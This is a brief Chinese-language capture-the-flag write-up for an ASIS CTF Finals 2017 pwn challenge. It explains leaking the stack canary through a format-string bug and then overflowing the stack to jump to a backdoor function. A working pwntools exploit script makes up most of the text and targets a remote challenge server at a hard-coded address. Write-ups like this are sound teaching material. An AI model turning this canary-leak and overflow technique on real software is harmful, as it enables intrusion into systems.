题目来源: ASIS-CTF-Finals-2017
题目描述:非常简单的热身pwn
程序开启了canary保护,因此利用格式化字符串漏洞泄露canary,然后利用栈溢出漏洞将返回地址指向后门函数即可
exp如下:
from pwn import * #io = process(‘./pwn‘) #io = gdb.debug(‘./pwn‘, ‘b *0x40093F‘) io = remote(‘111.200.241.244‘, 50734) backdoor_addr = 0x4008DA io.recvuntil(‘3. Exit the battle \n‘) io.sendline(‘2‘) sleep(1) io.sendline(‘%23$p\n‘) canary = int(io.recvline().strip(), 16) info(‘canary:‘+str(hex(canary))) io.recvuntil(‘3. Exit the battle \n‘) io.sendline(‘1‘) payload = b‘a‘ * 136 + p64(canary) + p64(0) + p64(backdoor_addr) sleep(1) io.send(payload) io.interactive()